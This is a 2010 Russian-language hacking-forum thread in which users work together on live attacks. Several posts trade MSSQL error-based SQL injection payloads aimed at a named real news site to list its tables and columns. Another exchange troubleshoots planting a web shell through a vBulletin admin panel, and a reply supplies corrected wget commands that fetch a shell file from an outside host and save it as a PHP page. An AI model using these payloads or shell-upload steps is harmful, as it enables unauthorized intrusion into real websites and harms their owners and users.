ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12801  
Старый 28.04.2010, 00:01
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от DrakonHaSh  
возможно фильтр на TABLE_NAME, попробуй перевести TABLE_NAME в hex или char
операторы нельзя переводить в hеx или char
 
Ответить с цитированием

  #12802  
Старый 28.04.2010, 00:02
Аватар для DrakonHaSh
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

ой, сорри, ступил

Последний раз редактировалось DrakonHaSh; 28.04.2010 в 00:09..
 
Ответить с цитированием

  #12803  
Старый 28.04.2010, 00:16
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок

Последний раз редактировалось pinch; 28.04.2010 в 00:20..
 
Ответить с цитированием

  #12804  
Старый 28.04.2010, 00:40
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от pinch  
странно... запрос обрабатывается "нормально" бех вывода ошибок
запрос
ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--

выводит пустую страницу без новостей, и ошибок
так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--

Последний раз редактировалось [Feldmarschall]; 28.04.2010 в 00:49..
 
Ответить с цитированием

  #12805  
Старый 28.04.2010, 08:27
Аватар для GroM88
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
Код:
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???
 
Ответить с цитированием

  #12806  
Старый 28.04.2010, 11:37
Аватар для DIEZalok
DIEZalok
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084

Репутация: 3
По умолчанию

Цитата:
Сообщение от GroM88  
хелп) сос))

Вообщем пытаюсь залить шелл через админку вб 4.0.2
Вообщем подробно не буду...
в модуль впихиваю такой код
system("wget -o /home/www/сайт.by/forum/customavatars/inbex2.php http://сайт.narod.ru/wso2.php");
Захожу на страницу forum.site.ru/faq.php
Думает,думает, и потом вылазит 404 not found
Далее иду по адресу
forum.сайт.by/customavatars/inbex2.php
и тупо белая страница
пытаюсь проделать туже функцию только меняю название шелла которое будет на серваке
и иногда показывает например по адресу
forum.сайт.by/customavatars/inbex3.php такую хрень = \ :
Код:
--2010-04-27 20:25:52-- http://сайт.narod.ru/wso2.php Resolving сайтnarod.ru... 213.180.199.44 Connecting to сайт.narod.ru|213.180.199.44|:80...
и больше ничего = \
кто знает в чем проблема?
почему шелл не заливается???

1. Писать не -o, а -O (зааглавная).
2. Правильно писать так: wget http://shell.com/shell.txt -O shell.php
-O - чтобы залить с другим именем.
-o - вместо шелла заливает по заданному адресу РЕЗУЛЬТАТ ЗАЛИВКИ, т.е. это не то.
А может прав нету? Проверь id; ls -la;
Если и вправду прав нету, то ищи где есть и делай так:
cd /tut/prava/0777/; wget http://xx.narod.ru/shell.txt -O shell.php
или в -O укажи путь новый, т.е. чтобы cd не писать.
 
Ответить с цитированием

  #12807  
Старый 28.04.2010, 11:54
Аватар для GroM88
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

DIEZalok Прочитай plz личку)
 
Ответить с цитированием

  #12808  
Старый 28.04.2010, 17:51
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
так попробуй +or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)-- иле так.. ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--
неее не катит....
http://www.looplifter.co.uk/news.asp?id=1
 
Ответить с цитированием

  #12809  
Старый 28.04.2010, 18:02
Аватар для v1d0qz
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

Цитата:
Сообщение от pinch  
не выводит таблицы ID=1+OR+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)--
в чем может быть проблема?

зато выводит колонки
ID=1+OR+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATI ON_SCHEMA.COLUMNS)--

Цитата:
Сообщение от [Feldmarschall]  
так попробуй
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+1+ table_name+from+information_schema.tables+order+by +table_name)--
иле так..
ID=convert(int,(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES))--
Цитата:
Сообщение от pinch  
неее не катит....
http://www.looplifter.co.uk/news.asp?id=1
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+cast(table_name+ as+int)+from+information_schema.columns)--

Я конечно понимаю что методом тыка, может что-то/когда-то получится, но всё же...Для начала узнайте что находится в базе information_schema и станет намного легче искать решения проблемы.

Последний раз редактировалось v1d0qz; 28.04.2010 в 18:13..
 
Ответить с цитированием

  #12810  
Старый 28.04.2010, 18:27
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

вот объясните (незнаком я с внутренним миром бд) впервые вижу такое сочетание:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.columns)--
такой запрос что выводит? таблицу, колонку?

вроде вывод ВСЕХ колонок бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+column_name+from +information_schema.columns)--

вывод ВСЕХ таблиц бд имеет вид:
http://www.looplifter.co.uk/news.asp?id=5+and+1=(select+top+1+table_name+from+ information_schema.tables)--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ